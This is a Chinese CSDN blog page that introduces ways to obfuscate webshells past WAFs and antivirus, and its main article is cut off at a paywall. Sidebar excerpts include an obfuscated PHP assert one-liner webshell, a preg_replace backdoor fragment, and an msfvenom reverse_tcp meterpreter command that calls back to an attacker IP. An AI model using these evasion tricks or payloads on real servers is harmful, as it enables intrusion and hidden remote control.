权限控制WAF绕过之木马混淆免杀

最新推荐文章于 2023-09-13 17:10:57 发布
最新推荐文章于 2023-09-13 17:10:57 发布
阅读量765 收藏
点赞数
分类专栏: 渗透与攻防 文章标签: 安全 web安全 网络安全 开发语言 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/127140165
版权
本文介绍了如何绕过Web应用程序防火墙(WAF)的保护,包括变量覆盖、加密混淆、异或生成等方法。通过这些技术,可以使得恶意代码在上传和执行过程中避开WAF的检测,实现木马的隐蔽传输和执行。文中提到了冰蝎等工具在实际操作中的应用。
摘要由CSDN通过智能技术生成

目录

前言:

绕过思路:

(一)变量覆盖

(二)加密混杂

未加密前:

接口加密

加密后:

WAF验证:

(三)异或生成

0x01 原理:

0x02 适用范围

(四)常用工具

1、冰蝎 

前言:

        当我们把有侵入性的代码写进去时,通过指纹信息,从而招到WAF的拦截,为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。

绕过思路:

一些应用防护设备会对上传的文件进行静态或者动态的查杀,静态主要是基于安全软件的特征库去匹配文件中的关键词,危险函数,变量等;动态主要是对变量的追踪,执行过程中的一些危险操作的监控。如果要避免被查杀就要考虑上传过程以及通信过程均不能被发现。上传考虑绕过,通信考虑加密。
我们将getshell分为2个大块:

  1. 木马先突破拦截上传
了解本专栏 订阅专栏 解锁全文 超级会员免费看
@Camelus
关注
专栏目录
订阅专栏
WebShell 木马免杀WAF
悦分享
08-02 674
什么是WAFWafweb应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级wafWAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2487
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1740
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
WAF绕过-木马混淆免杀姿势
告白的博客
08-27 880
0x00 简介 为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。 常见脚本: PHP, JSP, ASP, ASPX, Pytohn… 常见shell工具:中国菜刀, 蚂蚁宝剑, 冰蝎 比较推荐使用冰蝎适合后渗透,菜刀的使用比较局限也没有更新了, 菜
cs免杀之基于混淆和加壳
weixin_54855337的博客
04-14 4171
写在前面 最近也是没什么状态以及被身边人,事,物所受影响,环境对自己的影响也是非常大,但是随着时间的变化一切也都会改变,离群所居者,不是神灵,就是野兽,所以说需要脱离这种状态,找到自己人生中明确的方向,不能一天天的萎靡不正 简单进行混淆和加壳 其实早在去年11月左右就玩过一点cs,但是那个时候还是懵懵懂懂,虽然现在也是一样的 打开服务端,192.168.4.191为自己的ip也可以127.0.0.1,然后123123为连接密码 使用java或者bat再或者sh打开都可以,然后就是双..
免杀入门混淆加密方法分析,看这一篇就够了
MachineGunJoe666
05-25 1602
前言 在日常的渗透测试中,我们直接将metaspolit、CS等工具直接生成的恶意程序或代码发送到目标系统时,通常会遇防病毒和入侵检测系统的查杀。这使得我们的程序被拦截或者运行不稳定。有时候IP还会直接被封杀,增加了我们的攻击难度,这篇文章中,将为大家分享一些自己免杀的学习方法论,一些常用的AV和IDS规避技术,可以用于绕过一些安全软件。 编码器 通过一定规律的编码算法,将对metaspolit、CS生成的shellcode进行编码/模糊处理/变形,从原始shellcode中删除所有无效的字符,从而逃
Web提权技巧:一句话木马免杀艺术
技术细节部分,作者提到免杀(Evasion)策略,即通过修改或绕过安全软件的特征码识别,使得一句话木马能逃过检测。这类似于Windows环境下制作免杀可执行文件的方法,但相对而言,免杀Shell更为简单。文章以ASP、ASPX...
免杀PHP大马过狗
06-13
在“免杀PHP大马过狗”中,“过狗”一词通常指的是绕过防火墙或者安全软件的检测,这里的“狗”是对安全软件的一种形象化的比喻。黑客可能会使用多种技巧来实现这一目的,如加密通信、混淆代码、利用未知漏洞等,以...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1830
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
waf绕过-代码层面加密免杀
告白的博客
06-03 735
waf的代码执行层面的绕过,一般的waf都会检测特征字符,或者是关键字指纹等,我们在执行或上传waf时候需要对代码进行一次加密,以用来绕过wafde检测达到上传shell的目的,这里介绍一些代码层面的加密方式绕过waf http://www.phpjm.net/ https://www.phpjms.com/ http://1.15.155.76:1234/ 在二进制中:1 XOR 0=10 XOR 1=11 XOR 1=00 XOR 0=0可以看出若两个数相同取0,不同取1。 通过将对象构造为异或的结果从
waf免杀大马最新版.zip
08-21
渗透安全安全狗各种WAF
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
最新发布
xiaoheizi的博客
09-13 1292
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
网络安全】DRIDEX木马巧用VEH混淆API调用流程
HBohan的博客
11-08 4263
情报背景 DRIDEX是自2014年起活动至今的著名恶意银行木马家族,通常以OFFICE文档的方式进行文档钓鱼攻击。0xCERT的研究人员将其描述为精于防御规避的信息与凭据窃取恶意软件,利用众多C&C服务器令针对其的网络·封锁无能为力。DRIDEX在其历史行动中曾多次运用高级防御规避技术隐匿其恶意行为,其v4版本是第一个使用AtomBombing进程注入技术的恶意软件。 【学习资料】 而本文中将对其近期样本中利用向量化异常处理(VEH)机制混淆其API函数调用的手法进行分析研判,该手法对于动态静态分
免杀实战知识汇总~
Ms08067安全实验室
09-21 533
“第二期”2022.9.30开班第二期新增:除了对课程进行了优化,另增加了2节课,免杀实战中的常见技法,dll文件及编写和反沙盒和反调试机制;常见的恶意代码中的加壳和常见的恶意代码中的脱壳。免杀,wiki百科:反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀...
一句话木马,小马,大马,混淆一句话木马
Jim的博客
08-30 8324
php                 @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                   @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                   @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}               
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3201
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
python通过异或运算构造无字符后门实现免杀
klcyl_0106的博客
07-18 510
python实现无字符后门免杀
Invoke-Obfuscation混淆免杀过360和火绒
crowsec
06-01 2137
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
WAF绕过-权限控制工具】菜刀、蚁剑、冰蝎 下载、使用方法
m0_60571990的博客
10-31 1835
WAF绕过-权限控制工具】菜刀、蚁剑、冰蝎 下载、使用方法
绕过WAF:代码混淆权限控制下的行为造轮子实战
在第48天的学习内容中,我们探讨了WAFWeb应用防火墙)绕过的策略,特别关注的是如何在权限控制下通过代码混淆和行为层面的操作来实现这一目标。这部分技术主要针对Safedog、BTAliyun等平台,涉及到的手法包括但不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值